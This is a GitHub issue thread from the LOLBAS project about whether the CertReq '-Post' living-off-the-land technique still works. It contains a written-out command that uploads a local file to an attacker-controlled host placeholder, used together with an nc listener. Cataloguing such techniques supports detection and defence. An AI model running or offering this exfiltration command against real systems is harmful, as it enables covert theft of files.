### ISSUE TITLE
Removal of CertReq -Post as LOLBAS

### ISSUE THREAD

**Issue by Cuteness-overload** [LOLBAS-Project/LOLBAS#313]
In recent tests, I have attempted to execute a file upload using the CertReq LOLBAS in conjunction with a nc listener on my attacker machine. However, when launching the following command: 
`CertReq -Post -config http://<myip>/ C:\Users\theuser\Desktop\thefile`
I received an error message : "The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)"

As such I researched what could be causing this and did not find any documentation for the "-Post" parameter on [CertReq](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certreq_1). It is my understanding that this parameter seems to have been removed from the executable, and as such, the lolbas is no longer valid.
I would love to be wrong, so please do let me know if this is an error on my end.

**Comment by wietze** [comment]
Hey @Cuteness-overload, I have tested the command in my lab and can confirm it works as expected on Windows 10 and Windows 11 21H2. Not sure if you used different parameters or possibly a newer Windows version in which changes are made to `certreq`? Hope this helps:
![image](https://github.com/LOLBAS-Project/LOLBAS/assets/2811785/6c3d8ab0-94d3-48c1-a5cd-13998128104c)
![image](https://github.com/LOLBAS-Project/LOLBAS/assets/2811785/782890f1-4561-4094-a4e6-7546bb06c539)

**Comment by wietze** [comment]
I'm closing this ticket for now, but if you think I'm missing something please feel free to reopen!
